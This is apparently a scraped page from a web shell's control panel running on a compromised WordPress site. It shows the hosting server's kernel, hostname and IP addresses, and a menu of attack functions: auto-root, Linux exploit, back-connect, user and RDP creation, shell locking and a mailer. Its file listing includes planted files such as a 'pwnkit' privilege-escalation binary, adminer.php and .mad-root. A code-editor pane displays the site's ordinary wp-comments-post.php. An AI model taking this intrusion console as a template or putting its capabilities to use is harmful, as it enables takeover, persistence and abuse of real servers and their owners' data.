Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
bouteilles /
[ HOME SHELL ]
Name
Size
Permission
Action
_vti_cnf
[ DIR ]
drwxr-xr-x
animflashsite
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
35
B
-rwxr--r--
.mad-root
0
B
-rw-r--r--
2index.php
3.78
KB
-rw----r--
AA-zouerate_com_3
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
applesearch.css
445
B
-rwxr--r--
applesearch.js
1.39
KB
-rwxr--r--
default.css
173
B
-rwxr--r--
dummy.css
21
B
-rwxr--r--
favicon.ico
533
B
-rwxr--r--
index.php
397
B
-rwxr--r--
license.txt
15.05
KB
-rwxr--r--
osx_searchbox.html
389
B
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
radio.php
3.78
KB
-rw----r--
radio.txt
40
B
-rw----r--
readme.html
389
B
-r--r--r--
srch_bg.gif
65
B
-rwxr--r--
srch_l.gif
303
B
-rwxr--r--
srch_r.gif
227
B
-rwxr--r--
srch_r_f2.gif
278
B
-rwxr--r--
wp-app.php
33.27
KB
-rwxr--r--
wp-atom.php
555
B
-rwxr--r--
wp-blog-header.php
13.56
KB
-rwxr--r--
wp-comments-post.php
3.02
KB
-rwxr--r--
wp-commentsrss2.php
625
B
-rwxr--r--
wp-config-sample.php
1.53
KB
-rwxr--r--
wp-config.php
1.52
KB
-rw-------
wp-cron.php
1.23
KB
-rwxr--r--
wp-feed.php
661
B
-rwxr--r--
wp-links-opml.php
1.94
KB
-rwxr--r--
wp-load.php
1.9
KB
-rwxr--r--
wp-login.php
18.9
KB
-rwxr--r--
wp-mail.php
6.25
KB
-rwxr--r--
wp-pass.php
487
B
-rwxr--r--
wp-rdf.php
473
B
-rwxr--r--
wp-register.php
316
B
-rwxr--r--
wp-rss.php
484
B
-rwxr--r--
wp-rss2.php
555
B
-rwxr--r--
wp-settings.php
16.77
KB
-rwxr--r--
wp-trackback.php
3.35
KB
-rwxr--r--
xmlrpc.php
73.64
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) { header('Allow: POST'); header('HTTP/1.1 405 Method Not Allowed'); header('Content-Type: text/plain'); exit; } /** Sets up the WordPress Environment. */ require( dirname(__FILE__) . '/wp-load.php' ); nocache_headers(); $comment_post_ID = (int) $_POST['comment_post_ID']; $status = $wpdb->get_row( $wpdb->prepare("SELECT post_status, comment_status FROM $wpdb->posts WHERE ID = %d", $comment_post_ID) ); if ( empty($status->comment_status) ) { do_action('comment_id_not_found', $comment_post_ID); exit; } elseif ( !comments_open($comment_post_ID) ) { do_action('comment_closed', $comment_post_ID); wp_die( __('Sorry, comments are closed for this item.') ); } elseif ( in_array($status->post_status, array('draft', 'pending') ) ) { do_action('comment_on_draft', $comment_post_ID); exit; } $comment_author = trim(strip_tags($_POST['author'])); $comment_author_email = trim($_POST['email']); $comment_author_url = trim($_POST['url']); $comment_content = trim($_POST['comment']); // If the user is logged in $user = wp_get_current_user(); if ( $user->ID ) { $comment_author = $wpdb->escape($user->display_name); $comment_author_email = $wpdb->escape($user->user_email); $comment_author_url = $wpdb->escape($user->user_url); if ( current_user_can('unfiltered_html') ) { if ( wp_create_nonce('unfiltered-html-comment_' . $comment_post_ID) != $_POST['_wp_unfiltered_html_comment'] ) { kses_remove_filters(); // start with a clean slate kses_init_filters(); // set up the filters } } } else { if ( get_option('comment_registration') ) wp_die( __('Sorry, you must be logged in to post a comment.') ); } $comment_type = ''; if ( get_option('require_name_email') && !$user->ID ) { if ( 6 > strlen($comment_author_email) || '' == $comment_author ) wp_die( __('Error: please fill the required fields (name, email).') ); elseif ( !is_email($comment_author_email)) wp_die( __('Error: please enter a valid email address.') ); } if ( '' == $comment_content ) wp_die( __('Error: please type a comment.') ); $commentdata = compact('comment_post_ID', 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type', 'user_ID'); $comment_id = wp_new_comment( $commentdata ); $comment = get_comment($comment_id); if ( !$user->ID ) { setcookie('comment_author_' . COOKIEHASH, $comment->comment_author, time() + 30000000, COOKIEPATH, COOKIE_DOMAIN); setcookie('comment_author_email_' . COOKIEHASH, $comment->comment_author_email, time() + 30000000, COOKIEPATH, COOKIE_DOMAIN); setcookie('comment_author_url_' . COOKIEHASH, clean_url($comment->comment_author_url), time() + 30000000, COOKIEPATH, COOKIE_DOMAIN); } $location = ( empty($_POST['redirect_to']) ? get_permalink($comment_post_ID) : $_POST['redirect_to'] ) . '#comment-' . $comment_id; $location = apply_filters('comment_post_redirect', $location, $comment); wp_redirect($location); ?>
Close